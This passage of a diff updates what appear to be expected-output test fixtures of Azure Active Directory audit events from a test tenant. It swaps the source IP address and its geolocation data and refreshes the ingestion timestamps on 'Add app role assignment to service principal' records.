f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125348500Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -18495,25 +16893,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -18527,7 +16907,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -18663,7 +17043,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -18675,12 +17055,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036564400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125354800Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -18706,25 +17086,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -18738,7 +17100,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -18874,7 +17236,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
